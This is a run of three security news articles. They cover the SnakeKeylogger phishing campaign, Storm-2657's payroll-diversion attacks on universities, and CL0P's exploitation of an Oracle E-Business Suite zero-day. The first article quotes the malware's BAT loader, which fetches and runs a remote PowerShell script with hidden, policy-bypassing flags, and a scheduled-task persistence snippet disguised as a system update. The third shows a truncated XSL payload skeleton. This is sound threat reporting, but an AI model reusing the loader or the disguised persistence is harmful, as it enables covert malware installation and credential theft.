Emerging from a recent wave of targeted campaigns, SnakeKeylogger has surfaced as a potent infostealer that capitalizes on PowerShell and social engineering.

The malware’s operators craft convincing spear-phishing e-mails under aliases such as “CPA-Payment Files,” impersonating reputable financial and research firms.

Recipients encounter ISO or ZIP attachments containing a seemingly innocuous BAT script. Once executed, this script downloads and launches a PowerShell payload designed to harvest keystrokes and system information before exfiltrating data to a remote server.

Gen Threat Labs analysts noted the malware’s seamless blend of legitimate Windows utilities and custom scripting for stealth and rapid deployment.

After opening the attachment, victims unwittingly activate a BAT file resembling the following snippet:

@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {iwr hxxp://fxa.sabitaxt.com/mc55tP.ps1 -OutFile %TEMP%\snake.ps1; Start-Process powershell -ArgumentList '-NoP -NonI -W Hidden -Exec Bypass -File %TEMP%\snake.ps1'}"

This approach bypasses standard execution policies and conceals visible windows, allowing SnakeKeylogger to operate without raising suspicion.

The PowerShell script, once loaded, establishes persistence by creating scheduled tasks and registry entries, ensuring the malware survives reboots and avoids cursory incident response efforts.

Beyond initial delivery, SnakeKeylogger’s impact lies in its minimalist but efficient data collection routines. Upon activation, the script invokes Windows API functions to capture keystrokes, clipboard contents, and active window titles.

Collected information is batched and encoded before transmission to a command-and-control server.

Observed IoCs include BAT payload SHA256 hashes such as 3796e68... and the PowerShell script URL hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1, indicative of the ongoing campaign.

Infection Mechanism

SnakeKeylogger’s infection chain hinges on its two-stage loader. The initial BAT script exploits PowerShell’s unrestricted execution to retrieve the core keylogger module.

Within the PowerShell payload, the Add-Type cmdlet compiles C# code on the fly, injecting functions such as GetAsyncKeyState for low-level keystroke interception.

Persistence is achieved via a scheduled task entry resembling:-

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -File C:\Windows\Temp\snake.ps1'
Register-ScheduledTask -TaskName 'SystemUpdate' -Action $Action -Trigger (New-ScheduledTaskTrigger -AtLogon) -RunLevel Highest

This tactic not only reinstates the keylogger at each user login but also blends into legitimate Windows maintenance processes, complicating detection. Continuous monitoring and timely updates to endpoint protection policies are recommended to counteract this evolving threat.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post SnakeKeylogger via Weaponized E-mails Leverage PowerShell to Exfiltrate Sensitive Data appeared first on Cyber Security News.

A sophisticated financially motivated threat actor known as Storm-2657 has been orchestrating elaborate “payroll pirate” attacks targeting US universities and other organizations, Microsoft Threat Intelligence has revealed.

These attacks represent a concerning evolution in cybercriminal tactics, where hackers compromise employee accounts to gain unauthorized access to human resources systems and redirect salary payments to attacker-controlled bank accounts.

The campaign demonstrates the increasing sophistication of social engineering techniques combined with technical exploitation to achieve maximum financial impact.

The threat actor has been particularly active in targeting employees within higher education sectors, exploiting their access to third-party Software as a Service (SaaS) platforms like Workday.

Since March 2025, Microsoft researchers have observed 11 successfully compromised accounts at three universities that were subsequently used to launch phishing campaigns targeting nearly 6,000 email accounts across 25 different educational institutions.

The scale and precision of these operations indicate a well-resourced and methodical approach to financial fraud.

The attacks begin with carefully crafted phishing emails designed to harvest credentials through adversary-in-the-middle (AITM) phishing techniques.

These emails exploit multiple social engineering themes, including fake campus illness outbreaks with subject lines such as “COVID-Like Case Reported — Check Your Contact Status” and “Confirmed Case of Communicable Illness.”

The attackers also impersonate legitimate university communications, often referencing specific university presidents or HR departments to enhance credibility and increase victim engagement rates.

Microsoft analysts identified that Storm-2657 exploits organizations’ lack of phishing-resistant multifactor authentication, allowing them to intercept and use stolen MFA codes to gain initial access to Exchange Online accounts.

Once inside the compromised systems, the threat actors demonstrate remarkable persistence and stealth capabilities.

Technical Infiltration and Persistence Mechanisms

The technical sophistication of Storm-2657’s operations becomes evident in their post-compromise activities.

After gaining access to victim accounts, the threat actors immediately establish persistence by enrolling their own phone numbers as MFA devices within the compromised Workday profiles or Duo MFA settings.

This technique ensures continued access without requiring further MFA approval from legitimate users, effectively bypassing security controls that organizations believe protect their systems.

The attackers then create sophisticated inbox rules designed to automatically delete or hide incoming notification emails from Workday’s email service.

These rules are often named using only special characters like “….” or “\’\’\’\’” to avoid detection during casual security reviews.

This technique ensures that victims remain unaware of unauthorized changes to their payroll configurations, as the standard notification emails warning of profile modifications never reach their intended recipients.

Once persistence is established, Storm-2657 accesses Workday through single sign-on (SSO) authentication and methodically modifies victims’ salary payment configurations.

The Workday audit logs capture these activities as “Change My Account” or “Manage Payment Elections” events, providing forensic evidence of the unauthorized modifications.

Microsoft Defender for Cloud Apps can correlate these activities across both Microsoft Exchange Online and third-party SaaS applications like Workday, enabling comprehensive detection of suspicious cross-platform activities.

The attack methodology demonstrates careful planning to minimize detection while maximizing financial impact.

By leveraging legitimate authentication mechanisms and hiding evidence through automated email deletion, Storm-2657 has created a highly effective approach to financial fraud that can operate undetected for extended periods, potentially diverting multiple salary payments before discovery.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Microsoft Warns of Hackers Compromising Employee Accounts to Steal Salary Payments appeared first on Cyber Security News.

The cybersecurity landscape faces a new and significant threat as the notorious CL0P ransomware group has launched a large-scale extortion campaign targeting Oracle E-Business Suite (EBS) environments.

Starting September 29, 2025, security researchers began tracking a sophisticated operation where threat actors claimed affiliation with the CL0P extortion brand and initiated a high-volume email campaign targeting executives across numerous organizations.

The campaign represents a continuation of the group’s successful operational model of exploiting zero-day vulnerabilities in widely used enterprise applications.

The threat actors have been exploiting what appears to be CVE-2025-61882, a zero-day vulnerability in Oracle EBS environments, with exploitation activities potentially dating back to July 10, 2025.

Oracle initially reported on October 2, 2025, that attackers may have exploited vulnerabilities patched in July 2025, but subsequently issued emergency patches on October 4 to address the vulnerability after discovering active exploitation.

The campaign follows months of intrusion activity targeting EBS customer environments, with successful data exfiltration from multiple impacted organizations.

Google Cloud analysts identified the sophisticated multi-stage attack methodology employed by the threat actors, which begins with exploitation of Oracle EBS servers through a complex vulnerability chain.

The attackers utilized compromised third-party email accounts, likely sourced from infostealer malware logs sold on underground forums, to send extortion emails to company executives.

These emails contained contact addresses support@pubstorm.com and support@pubstorm.net, which have been associated with the CL0P data leak site since at least May 2025.

The technical analysis reveals that Google Threat Intelligence Group has documented evidence of the group providing legitimate file listings from victim EBS environments to substantiate their extortion claims, with data dating back to mid-August 2025.

The threat actors have indicated that alleged victims can prevent the release of stolen data in exchange for payment, though specific amounts and methods have not been disclosed, following typical modern extortion operation patterns where demands are provided only after initial victim contact.

Multi-Stage Java Implant Framework Deployment

The sophistication of the CL0P operation becomes evident through their deployment of a multi-stage Java implant framework designed specifically for Oracle EBS compromise.

The primary attack vector involves exploitation of the SyncServlet component, allowing for unauthenticated remote code execution.

The threat actors initiate attacks with POST requests to /OA_HTML/SyncServlet, subsequently leveraging the XDO Template Manager functionality to create malicious templates within the EBS database.

The exploit chain demonstrates advanced technical capabilities, with payloads stored as new templates in the XDO_TEMPLATES_B database table.

Template names consistently begin with prefixes “TMP” or “DEF”, with TemplateType set to “XSL-TEXT” or “XML” respectively.

The malicious XSL payload structure follows this format:-

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.o"
                xmlns:b64="http://www.orac"
                xmlns:jsm="http://www.orac"
                xmlns:eng="http://www.orac"
                xmlns:str="http://www.orac">
    <xsl:template match="/">
        <xsl:variable name="bs" select="b64:decode"/>
        <xsl:variable name="js" select="str:new"/>
        <xsl:value-of select="$code"/>
    </xsl:template>
</xsl:stylesheet>

The framework includes two primary payload chains: GOLDVEIN.JAVA, a Java variant downloader that establishes connections to attacker-controlled command and control servers disguised as “TLSv3.1” handshakes, and the SAGE infection chain consisting of multiple nested Java payloads.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Google Warns of CL0P Ransomware Group Actively Exploiting Oracle E-Business Suite Zero-Day appeared first on Cyber Security News.